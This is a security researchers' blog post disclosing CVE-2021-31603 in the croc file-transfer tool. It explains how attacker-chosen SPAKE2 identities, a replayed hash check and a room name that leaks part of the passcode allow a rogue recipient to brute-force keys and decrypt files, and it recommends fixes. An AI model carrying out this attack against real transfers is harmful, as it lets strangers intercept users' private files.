Croc Full Plaintext Recovery - CVE-2021-31603

TL;DR

This blog post describes various security vulnerabilities we found within the popular file sharing service croc. These vulnerabilities can be chained together to launch file interception attacks against croc’s relay server.

With this practical attack, a remote attacker is able to intercept and decrypt all files sent via croc. An attacker does not need to host a malicious croc gateway, but is able to exploit any gateway. At the bottom of the blog post is a video of the attack.

Background

CVE-2021-31603 is a combination of multiple vulnerabilities that are mostly interesting from a cryptographer’s perspective. It also shows how an easy-to-get-wrong detail in the SPAKE2 protocol can completely break all security guarantees.

But first things first. What is croc?

On its GitHub page, croc is described as “a tool that allows any two computers to simply and securely transfer files and folders”. Among other things it claims end-to-end encryption using a password-authenticated key exchange (PAKE). Croc’s usage is quite simple. The sender gets a three-word passphrase to share with the receiver. The receiver just has to type in the passphrase to receive the files.

Croc Usage

To understand the attack, it’s also important to note that croc has a semi-centralized architecture.

Croc Architecture

Even if the sender and receiver have a direct connection for transmission later on, the sender and receiver always establish their connection via a relay server on the internet.

PAKEs

The centerpiece of the vulnerability is croc’s PAKE implementation. PAKE protocols are used to exchange a strong cryptographic key based on a low-entropy shared secret. This is achieved by designing the protocol in such a way that an attacker cannot brute force the low-entropy shared secret based on the transcript, and an active attacker can only try out one shared secret per protocol pass. It is the responsibility of the involved parties (here sender, relay and receiver) to detect and prevent online brute force attacks.

Usually, PAKE protocols make use of some group action like Elliptic Curve Diffie-Hellman (ECDH). The PAKE protocol used in croc is SPAKE2, which is based on the DH key exchange. SPAKE2 is depicted in the following message diagram.

SPAKE2 is basically an Elliptic Curve Diffie-Hellman key exchange with additional blinding. \(P\) is the generator of the group used for Diffie-Hellman. The blinding factors are derived from the public parameters \(U\) and \(V\) raised to the power of the passcode (\(p\)). Even if a passive attacker iterates over all possible passcodes to recover all possible public keys (\(\alpha P\), \(\beta P\)), he is still not able to compute the discrete logarithm of these public keys. He can therefore neither compute the exchanged key \(w\) nor identify the correct passcode \(p\).
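Written out in the notation of this post, the exchange can be summarized as follows. This is a reconstruction from the code and the derivation further down, assuming additive (elliptic curve) notation, with \(\alpha\) and \(\beta\) the ephemeral secrets of the two parties:

$$\begin{aligned} X & = \alpha P + pU \\ Y & = \beta P + pV \\ w & = \alpha(Y - pV) = \beta(X - pU) = \alpha\beta P \end{aligned}$$

Both parties can remove the blinding only if they know \(p\), and only then do they arrive at the same \(w\).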

Croc’s Protocol

On a high level, croc’s file exchange protocol works in 8 steps:

  1. The sender generates a three-word passcode, e.g. anita-price-quick.
  2. The sender connects to the public relay.
  3. The sender joins a “room” on the relay. The room’s identifier is the first three characters of the passcode, e.g. ani.
  4. The recipient receives the passcode via a secure channel.
  5. The recipient connects to the public relay.
  6. The recipient joins the sender’s relay room, identifying it with the shared passcode.
  7. The sender and receiver establish a shared key \(k_e\) using SPAKE2 and the passcode \(p\).
  8. The sender transfers the file, encrypted under \(k_e\), via a direct connection.
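Step 3 is worth a closer look, because the relay (and anyone who joins the room) learns part of the passcode. A minimal sketch of that derivation, assuming the room is simply the first three characters as described above; the function names and the tiny wordlist are made up for illustration and are not croc's:

```go
package main

import (
	"fmt"
	"strings"
)

// roomName returns the relay room for a passcode, assuming the room is
// the first three characters of the passcode.
func roomName(passcode string) string {
	if len(passcode) < 3 {
		return passcode
	}
	return passcode[:3]
}

// firstWordCandidates lists the wordlist entries that are still possible
// first words once the room name is known.
func firstWordCandidates(room string, wordlist []string) []string {
	var out []string
	for _, w := range wordlist {
		if strings.HasPrefix(w, room) {
			out = append(out, w)
		}
	}
	return out
}

func main() {
	// Hypothetical excerpt, not croc's actual wordlist.
	words := []string{"anita", "animal", "price", "quick"}
	room := roomName("anita-price-quick")
	fmt.Println(room, firstWordCandidates(room, words))
}
```

Anyone who sees the room name can narrow down the first word in this way, which the exploit below relies on.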

While it is possible to host your own relay, there is a hardcoded default relay hosted at DigitalOcean.

The Vulnerability

The critical vulnerability resides in croc’s SPAKE2 implementation. It implements SPAKE2 using elliptic curves and misses a crucial detail.

There is an RFC in the works, standardizing SPAKE2. The RFC’s draft contains a curious sentence that is quite important, but easy to overlook:

[...]
Note that the choice of M and N is critical for the security proof.
The generation methods specified in this document are designed to
eliminate concerns related to knowing discrete logs of M and N.
[...]

M and N refer to the public identities of the two involved parties, in our case sender and receiver. The identities are called \(U\) and \(V\) in our message diagram above. The RFC seems to hint that it is problematic to know the discrete logarithm of the identities. But why is that a problem?

Let's imagine an attacker \(Mallory\) who tries to impersonate party \(Alice\). The attacker knows the discrete logarithm \(a_d\) of \(U = a_d P\) and sends an unblinded Diffie-Hellman parameter \(X = \alpha P\) to party \(Bob\). \(Bob\) then calculates:

$$\begin{aligned} w & = \beta(X - pU) \\ & = \beta(\alpha P - p \cdot a_d P) \\ & = \beta(\alpha - a_d \cdot p) P \\ & = (\alpha - a_d \cdot p)(\beta P) \\ & = (\alpha - a_d \cdot p)(Y - pV) \end{aligned}$$

As \(Mallory\) knows \(\alpha, a_d, Y\) and \(V\), the only unknown left in Bob’s \(w\) is the passcode \(p\), so the entropy of \(w\) is reduced to that of the passcode. This is highly problematic, since SPAKE2 is supposed to guarantee safety even for extremely low-entropy passcodes. If \(Mallory\) can get \(Bob\) to encrypt anything under the key \(k\) derived from \(w\), \(Mallory\) can brute force the key. Note that this is only possible because we know the discrete logarithm of \(U\). If \(U\) is chosen so that nobody knows its discrete logarithm, this attack is not possible.
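The derivation can be checked with a small experiment. The sketch below is illustrative only: it uses P-256 from Go's standard library as a stand-in curve (croc used siec), derives fixed demo scalars from labels, and compares Mallory's guess directly against Bob's \(w\), which stands in for testing a guess against something Bob encrypts under the derived key. All function names are hypothetical.

```go
package main

import (
	"crypto/elliptic"
	"crypto/sha256"
	"fmt"
	"math/big"
)

// P-256 is a stand-in curve for this sketch; croc itself used siec.
var (
	curve = elliptic.P256()
	order = curve.Params().N
)

// scalar derives a fixed demo scalar from a label (hypothetical helper).
func scalar(label string) *big.Int {
	h := sha256.Sum256([]byte(label))
	return new(big.Int).Mod(new(big.Int).SetBytes(h[:]), order)
}

// sub returns (x1,y1) - (x2,y2); (0,0) encodes the point at infinity.
func sub(x1, y1, x2, y2 *big.Int) (*big.Int, *big.Int) {
	if x2.Sign() == 0 && y2.Sign() == 0 {
		return x1, y1
	}
	negY := new(big.Int).Sub(curve.Params().P, y2)
	return curve.Add(x1, y1, x2, negY)
}

// bobKey is Bob's honest computation w = beta*(X - p*U).
func bobKey(beta, p, xX, yX, xU, yU *big.Int) *big.Int {
	px, py := curve.ScalarMult(xU, yU, p.Bytes())
	dx, dy := sub(xX, yX, px, py)
	wx, _ := curve.ScalarMult(dx, dy, beta.Bytes())
	return wx
}

// malloryKey evaluates (alpha - a_d*c)*(Y - c*V) for a passcode guess c.
func malloryKey(alpha, ad, c, xY, yY, xV, yV *big.Int) *big.Int {
	s := new(big.Int).Mul(ad, c)
	s.Sub(alpha, s).Mod(s, order)
	cx, cy := curve.ScalarMult(xV, yV, c.Bytes())
	dx, dy := sub(xY, yY, cx, cy)
	wx, _ := curve.ScalarMult(dx, dy, s.Bytes())
	return wx
}

// recoverPasscode plays both roles and returns Mallory's recovered
// passcode, or -1 if no guess in [1, maxGuess] matches.
func recoverPasscode(secret, maxGuess int64) int64 {
	// Mallory picks U and V herself, so she knows a_d with U = a_d*P.
	ad := scalar("dlog of U")
	xU, yU := curve.ScalarBaseMult(ad.Bytes())
	xV, yV := curve.ScalarBaseMult(scalar("dlog of V").Bytes())
	alpha := scalar("alpha")
	xX, yX := curve.ScalarBaseMult(alpha.Bytes()) // unblinded X = alpha*P

	// Bob follows the protocol with the real passcode p.
	p, beta := big.NewInt(secret), scalar("beta")
	bx, by := curve.ScalarBaseMult(beta.Bytes())
	pvx, pvy := curve.ScalarMult(xV, yV, p.Bytes())
	xY, yY := curve.Add(bx, by, pvx, pvy) // Y = beta*P + p*V
	w := bobKey(beta, p, xX, yX, xU, yU)

	// Mallory only uses alpha, a_d, Y and V, plus one guess at a time.
	for c := int64(1); c <= maxGuess; c++ {
		if malloryKey(alpha, ad, big.NewInt(c), xY, yY, xV, yV).Cmp(w) == 0 {
			return c
		}
	}
	return -1
}

func main() {
	fmt.Println(recoverPasscode(1234, 2000))
}
```

The loop never touches \(\beta\) or the real passcode; it needs only values Mallory chose herself or received from Bob.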

The following code snippet shows how the initial SPAKE2 message is generated within croc’s SPAKE2 module.

p.Role = 0
p.curve = curve
p.Pw = pw
rand1 := make([]byte, 8)
rand2 := make([]byte, 8)
_, err = rand.Read(rand1)
if err != nil {
    return
}
_, err = rand.Read(rand2)
if err != nil {
    return
}
p.Uᵤ, p.Uᵥ = p.curve.ScalarBaseMult(rand1)
p.Vᵤ, p.Vᵥ = p.curve.ScalarBaseMult(rand2)
if !p.curve.IsOnCurve(p.Uᵤ, p.Uᵥ) {
    err = errors.New("U values not on curve")
    return
}
if !p.curve.IsOnCurve(p.Vᵤ, p.Vᵥ) {
    err = errors.New("V values not on curve")
    return
}

// STEP: A computes X
p.Vpwᵤ, p.Vpwᵥ = p.curve.ScalarMult(p.Vᵤ, p.Vᵥ, p.Pw)
p.Upwᵤ, p.Upwᵥ = p.curve.ScalarMult(p.Uᵤ, p.Uᵥ, p.Pw)
p.Aα = make([]byte, 8) // randomly generated secret
_, err = rand.Read(p.Aα)
if err != nil {
    return
}
p.Aαᵤ, p.Aαᵥ = p.curve.ScalarBaseMult(p.Aα)
p.Xᵤ, p.Xᵥ = p.curve.Add(p.Upwᵤ, p.Upwᵥ, p.Aαᵤ, p.Aαᵥ) // "X"
// now X should be sent to B

The lines that fill rand1 and rand2 and pass them to ScalarBaseMult (highlighted in the original listing) show how the initializing party generates the identities for both parties, which are named \(U\) and \(V\). These values are exchanged together with the public parameter named \(X\) (just as in the message diagram above). In croc, the initializing party is the recipient of the file.

The second party - in croc this is the sender - takes these parameters and uses them for the further calculations. This means that an attacker can freely generate both identities \(U\), \(V\) and therefore knows their discrete logarithms. With this knowledge an attacker can impersonate every recipient by reducing the entropy of the cryptographic key as described above and brute force the key.

Exploit

The goal of the exploit is to show that an attacker can create a rogue recipient that receives files from strangers and is able to decrypt them without knowing the passcode, therefore fully breaking all security promises made by croc.

First, we have to initialize a connection with the sender. In order to do so we have to join the victim’s room on the relay. We know that the victim’s room is identified with the first three letters of the passcode. A look at the underlying wordlist shows that there are 896 possible rooms the victim can join.

The attack starts when our attacker - the rogue recipient - gets connected to a sender via the relay. Our rogue recipient behaves like a normal croc recipient and follows the normal protocol, depicted in the next diagram.

The recipient initializes the SPAKE2 key exchange by sending its blinded Diffie-Hellman parameter \(X\) as well as the public parameter \(U\) and \(V\).

The sender then answers with its public parameter \(Y\) as well as \(H_{kb}\), which is a bcrypt hash of the exchanged key. This is an absolutely terrible idea and already enough to brute force the exchanged key. Unfortunately, bcrypt is used for hashing, which is computationally expensive. With our resources we would need at least a few days to brute force the passcode based on this hash. Since this is an interactive attack (no sender of a file will wait for a couple of days) we can’t do that.

In the next message the sender expects us to send him a bcrypt hash of the passcode as well. We cannot generate such a hash without knowing the passcode. Luckily the sender does not check whether the hash we provide is the same as the hash he sent to us. Therefore, we can just replay his hash to bypass the check.
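The missing check is small. A minimal sketch of it, with hypothetical names (ownHash for the hash the sender produced, peerHash for the one it receives); it only detects the replay and does not replace verifying the received hash against the exchanged key:

```go
package main

import (
	"bytes"
	"errors"
	"fmt"
)

// checkPeerConfirmation rejects a key confirmation that merely echoes
// the one we sent ourselves. Salted hashes from an honest peer differ.
func checkPeerConfirmation(ownHash, peerHash []byte) error {
	if bytes.Equal(ownHash, peerHash) {
		return errors.New("peer replayed our own key confirmation")
	}
	return nil
}

func main() {
	own := []byte("hash-sent-by-sender") // placeholder bytes, not a real bcrypt hash
	fmt.Println(checkPeerConfirmation(own, own))
}
```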

The sender then generates a salt which it will send to us. We just have to reply with the same salt. Together with the SPAKE2 exchanged secret \(k\) this salt will be used to derive the encryption key \(k_e\) using PBKDF2, \(k_e = PBKDF2(k, salt)\). This step does not provide any additional security since the key from the key exchange is already strong enough.

From now on, the sender will use AES-GCM with the derived key \(k_e\) to encrypt and tag all messages. The sender’s first encrypted message contains a list of its external IP addresses. The plaintext of this encrypted message has the form {"t":"externalip",...". Up to this point we could not brute force the passcode in a reasonable amount of time. But as the encrypted list of IP addresses is valid JSON and has a known prefix, we can use the encrypted message to brute force \(k_e\). This is possible because we reduced the entropy of the exchanged key \(k\) to that of the passcode by supplying our backdoored identities \(U\) and \(V\).

For bruteforcing we can generate an encryption key for all possible passcodes and try to decrypt the message using this key. We get the correct passcode once a valid decryption of the form {"t":"externalip",..." is found. Since the structure of the message is known, the exploit uses AES-CTR to decrypt the message and omits the validation of the GCM authentication tag for performance reasons.
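The CTR shortcut works because GCM encrypts its payload in counter mode: for a 96-bit nonce, the first data block uses the counter block nonce || 0x00000002. A minimal sketch of the prefix test follows. It is not the exploit's code: candidateKey is a stand-in that hashes the guess with SHA-256 instead of running SPAKE2 and PBKDF2, sealDemo plays the sender, and the message body after the known prefix is made up.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/sha256"
	"fmt"
)

var knownPrefix = []byte(`{"t":"externalip"`)

// candidateKey is a stand-in for the real derivation (SPAKE2 result fed
// into PBKDF2); here a passcode guess is simply hashed to an AES-256 key.
func candidateKey(passcode string) []byte {
	k := sha256.Sum256([]byte(passcode))
	return k[:]
}

// sealDemo plays the sender: AES-GCM encryption under the passcode's key.
func sealDemo(passcode string, nonce, plaintext []byte) []byte {
	block, err := aes.NewCipher(candidateKey(passcode))
	if err != nil {
		panic(err)
	}
	gcm, err := cipher.NewGCM(block)
	if err != nil {
		panic(err)
	}
	return gcm.Seal(nil, nonce, plaintext, nil) // ciphertext || tag
}

// prefixMatches decrypts only the start of a GCM ciphertext with plain
// CTR and compares it to the known prefix, skipping tag verification.
func prefixMatches(key, nonce, ciphertext []byte) bool {
	block, err := aes.NewCipher(key)
	if err != nil || len(nonce) != 12 || len(ciphertext) < len(knownPrefix) {
		return false
	}
	iv := make([]byte, 16)
	copy(iv, nonce)
	iv[15] = 2 // GCM data counter starts at nonce || 0x00000002
	out := make([]byte, len(knownPrefix))
	cipher.NewCTR(block, iv).XORKeyStream(out, ciphertext[:len(knownPrefix)])
	return bytes.Equal(out, knownPrefix)
}

// findPasscode returns the first guess whose key yields the known prefix.
func findPasscode(guesses []string, nonce, ciphertext []byte) string {
	for _, g := range guesses {
		if prefixMatches(candidateKey(g), nonce, ciphertext) {
			return g
		}
	}
	return ""
}

func main() {
	nonce := make([]byte, 12) // all-zero nonce, acceptable only in a demo
	ct := sealDemo("anita-price-quick", nonce, []byte(`{"t":"externalip","demo":true}`))
	fmt.Println(findPasscode([]string{"anita-price-slow", "anita-price-quick"}, nonce, ct))
}
```

Skipping the tag saves the GHASH computation per guess; a 17-byte prefix match is already far too unlikely to occur by accident.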

The full passcode has an entropy of roughly 4 bytes, which is painful to brute force in a short amount of time. However, the entropy can be further reduced since we know which room the sender connected to. The room identifier leaks the first three letters of the first word of the passcode. A look at the wordlist reveals that at most two first words are possible per room identifier. With croc’s wordlist of size 1633, this reduces the passcode to \(2 * 1633^2 \approx 5 \cdot 10^6\) possible values.
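As a quick check of these numbers, assuming all three words are drawn from the same list of 1633 words:

$$\begin{aligned} 1633^3 & = 4{,}354{,}703{,}137 \approx 2^{32} \\ 2 \cdot 1633^2 & = 2 \cdot 2{,}666{,}689 = 5{,}333{,}378 \approx 2^{22.3} \end{aligned}$$

Knowing the room therefore removes roughly 10 bits from the search space.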

Bruteforcing through 5 million possible ECDH keys should be easily doable on a strong computer. Unfortunately there are no optimized implementations available for the uncommon siec curve used within croc. So for our exploit to work in a reasonable time, we either had to properly implement the curve ourselves or throw more computational power at it. Out of convenience we took the latter option and spun up 10 AWS instances as bruteforce workers. They were able to find the decryption key \(k_e\) in - on average - 20 seconds. This is fast enough for an interactive attack, since the transmission of the passcode to the intended recipient is likely to take longer. Apart from that, since our rogue recipient is already occupying the room, the intended receiver won’t be able to connect to the relay and will likely spend some time hunting for typos. Nevertheless, with more hardware or a faster implementation of siec it would easily be possible to decrease this time.

Now that we obtained the correct key \(k_e\) it’s possible to follow the normal protocol flow and start the transmission of the file. Once the encrypted file was transmitted, we can decrypt it with the recovered key \(k_e\).

Showcase

To show our working exploit in action we created a video of a successful attack. Notice that the sender (on the left) uses a freshly cloned up-to-date croc version. The rogue recipient - without knowledge of the generated passcode - can be seen on the right. In the video, you can see that the rogue recipient first hooks itself to the public relay and waits for a victim.

For entertainment value the video is slightly fast-forwarded. The critical bruteforce step took 17 seconds.

Further Problems with Croc

While taking a look at this application we noted other behavior which might not be directly exploitable but could lead to vulnerabilities in the future.

Active Man-In-The-Middle

The sender-to-relay connection is “secured” with a SPAKE2 key exchange. Strangely this connection uses the hardcoded passcode pass123 and therefore does not provide security against an active attacker. Although somewhat nasty, we won’t focus on this bug here because confidentiality and authenticity are not crucial for this step.

Protocol sequence is not enforced

All messages between the recipient and sender are handled by the processMessage function in croc.go. This function does not enforce the sequence of the messages. If an encryption key is set, incoming messages are decrypted. Otherwise the messages are processed without decryption. This allows an attacker to start the protocol with an external IP message and omit the key exchange to use the protocol without encryption. The only thing preventing the sender from sending the file unencrypted is the fact that the Go crypto library will throw an error while encrypting data with a nil key, which results in a panic.
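One way to enforce the sequence is an explicit state machine that rejects any message not expected in the current phase. The sketch below is hypothetical and not croc's code: the phase names and the message types "pake" and "salt" are invented for illustration, only "externalip" appears in the protocol description above.

```go
package main

import "fmt"

type phase int

const (
	awaitingPake phase = iota // no key material yet
	awaitingSalt              // key exchanged, salt not yet confirmed
	encrypted                 // k_e is set, everything must be encrypted
)

type session struct {
	phase phase
}

// handle accepts a message type only if it is valid in the current phase.
func (s *session) handle(msgType string) error {
	switch {
	case s.phase == awaitingPake && msgType == "pake":
		s.phase = awaitingSalt
	case s.phase == awaitingSalt && msgType == "salt":
		s.phase = encrypted
	case s.phase == encrypted && msgType == "externalip":
		// The message would be decrypted and processed here.
	default:
		return fmt.Errorf("message %q not allowed in phase %d", msgType, s.phase)
	}
	return nil
}

func main() {
	s := &session{}
	fmt.Println(s.handle("externalip")) // rejected: the key exchange was skipped
}
```

With such a gate, skipping the key exchange fails cleanly instead of relying on a panic deep inside the encryption call.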

Path traversal

The sender of the file specifies the path where the file will be stored but only the actual filename is displayed to the recipient. This could lead to the sender overwriting files without the knowledge of the recipient.

Fixes

Last but not least, we’ll give some advice on how to fix some of the problems listed above.

Error in the implementation of SPAKE2

As described in the RFC for SPAKE2, the public identities for both parties should be hardcoded by the application. These values should be chosen in a way that lets the developer demonstrate that he is unlikely to know their discrete logarithms himself. In addition, a check should be implemented which ensures that \(H_{ka}\) and \(H_{kb}\) are different from each other.
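A common way to obtain such values is to derive them from a public seed by hashing, so that nobody gets to choose the point as a known multiple of the generator. The following sketch illustrates the idea with a simple try-and-increment loop on P-256. It is an assumption-laden illustration, not the generation procedure from the SPAKE2 specification, and the seed strings and function names are made up.

```go
package main

import (
	"crypto/elliptic"
	"crypto/sha256"
	"encoding/binary"
	"fmt"
	"math/big"
)

// derivePoint hashes seed||counter to an x coordinate and returns the
// first candidate that lies on P-256, together with one matching y.
func derivePoint(seed string) (x, y *big.Int) {
	params := elliptic.P256().Params()
	three := big.NewInt(3)
	for ctr := uint32(0); ; ctr++ {
		var c [4]byte
		binary.BigEndian.PutUint32(c[:], ctr)
		h := sha256.Sum256(append([]byte(seed), c[:]...))
		x = new(big.Int).SetBytes(h[:])
		if x.Cmp(params.P) >= 0 {
			continue // not a valid field element, try the next counter
		}
		// y^2 = x^3 - 3x + b, the curve equation of the NIST curves.
		y2 := new(big.Int).Exp(x, three, params.P)
		y2.Sub(y2, new(big.Int).Mul(three, x))
		y2.Add(y2, params.B)
		y2.Mod(y2, params.P)
		if y = new(big.Int).ModSqrt(y2, params.P); y != nil {
			return x, y
		}
	}
}

// onCurve reports whether the point derived from seed is a valid point.
func onCurve(seed string) bool {
	x, y := derivePoint(seed)
	return elliptic.P256().IsOnCurve(x, y)
}

// distinct reports whether two seeds lead to different x coordinates.
func distinct(seedA, seedB string) bool {
	xa, _ := derivePoint(seedA)
	xb, _ := derivePoint(seedB)
	return xa.Cmp(xb) != 0
}

func main() {
	fmt.Println(onCurve("demo seed for U"), onCurve("demo seed for V"))
}
```

The resulting coordinates would then be hardcoded, and the seed published so that others can re-derive them.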

Room leaks first word of the passcode

The room should not be derived from the passcode but should rather use a separate identifier, similar to how it is done in magic-wormhole.
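As a rough sketch of what a separate identifier could look like, the room name can simply be drawn at random and transmitted next to the passcode. The function name and the 4-byte length are arbitrary choices for illustration:

```go
package main

import (
	"crypto/rand"
	"encoding/hex"
	"fmt"
)

// newRoomID returns a random identifier that carries no information
// about the passcode.
func newRoomID() (string, error) {
	b := make([]byte, 4)
	if _, err := rand.Read(b); err != nil {
		return "", err
	}
	return hex.EncodeToString(b), nil
}

func main() {
	id, err := newRoomID()
	if err != nil {
		panic(err)
	}
	fmt.Println("room:", id)
}
```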

Path traversal

The sender should not be able to control the path of the file. The recipient should just take the filename from the sender and should save the file to the current working directory.
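On the receiving side this boils down to discarding every directory component before opening the output file. A minimal sketch, assuming the recipient gets the path as a plain string; safeFilename is a hypothetical helper and not part of croc:

```go
package main

import (
	"errors"
	"fmt"
	"path/filepath"
	"strings"
)

// safeFilename reduces a sender-supplied path to a bare filename that
// can be created in the current working directory.
func safeFilename(remote string) (string, error) {
	// Treat backslashes as separators too, so Windows-style paths are
	// stripped regardless of the recipient's platform.
	name := filepath.Base(strings.ReplaceAll(remote, `\`, "/"))
	if name == "." || name == ".." || name == "/" || name == "" {
		return "", errors.New("sender supplied no usable filename")
	}
	return name, nil
}

func main() {
	fmt.Println(safeFilename("../../.ssh/authorized_keys"))
}
```

Displaying the sanitized name to the recipient, rather than the raw one, also keeps what is shown and what is written in sync.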

Conclusion

A small bug can go a long way. It is difficult to implement crypto protocols correctly, especially when a small detail can completely break all security. Unfortunately that’s the case for most protocols. Cryptography is still scary.

Some of the design decisions in the croc protocols are quite weird (to use layman’s terms). To us it seems plausible that the bug we found and described here is not the only one in the croc code base.

Update

Croc’s maintainer has now fixed this vulnerability and published a blog post about it.